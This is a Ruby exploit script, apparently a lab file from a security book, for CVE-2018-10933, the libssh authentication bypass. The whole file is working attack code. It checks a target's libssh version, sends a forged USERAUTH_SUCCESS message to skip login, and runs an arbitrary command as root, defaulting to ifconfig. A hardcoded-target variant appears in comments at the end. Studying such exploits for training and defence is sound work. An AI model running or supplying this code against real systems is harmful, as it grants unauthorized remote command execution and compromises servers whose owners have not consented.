#!/usr/bin/env ruby
# ========================================================= #
# This file is a part of { Black Hat Ruby } book lab files. #
# ========================================================= #
#
# Author:
#   Sabri Hassanyah | @KINGSABRI
# Description:
#   CVE-2018-10933 exploit
# Requirements:
#   gem install net-ssh
# 
begin
  require 'net/ssh'
rescue Exception => e
  puts "[!] Please Install 'net-ssh' gem on your system: gem install net-ssh"
end

if ARGV.size >= 1
  host   = ARGV[0]
  port   = ARGV[1] || 22
  user   = ARGV[2] || 'root'
  cmd    = ARGV[3] || 'ifconfig'
else 
  puts "ruby #{__FILE__} <TARGET> [PORT] [USER] [CMD]"
  exit
end

vulnerable_versions = [*'0.6.0'..'0.7.5', *'0.8.0'..'0.8.3'].to_a

opts = {
  user:             user,
  port:             port.to_i,
  auth_methods:     ['password']
}

include Net::SSH::Authentication::Constants
transport = Net::SSH::Transport::Session.new(host, opts)
target_version = transport.server_version.version
if !vulnerable_versions.select {|v| target_version.include?(v)}.empty?
  puts "[*] Target is vulnerable"
  message = Net::SSH::Buffer.from(:byte, USERAUTH_SUCCESS)
  transport.send_message(message)
  session = Net::SSH::Connection::Session.new(transport)
  puts "[+] Executing your command: #{cmd}"
  puts session.exec!(cmd)
else
  puts "[*] Target is not vulnerable"
end



## Shorter Version ##
# require 'net/ssh'

# opts = {
#   user:             'root',
#   port:             22,
#   auth_methods:     ['password']
# }

# include Net::SSH::Authentication::Constants
# transport = Net::SSH::Transport::Session.new('192.168.100.17', opts)
# message = Net::SSH::Buffer.from(:byte, USERAUTH_SUCCESS)
# transport.send_message(message)
# session = Net::SSH::Connection::Session.new(transport)
# puts session.exec!('ifconfig')
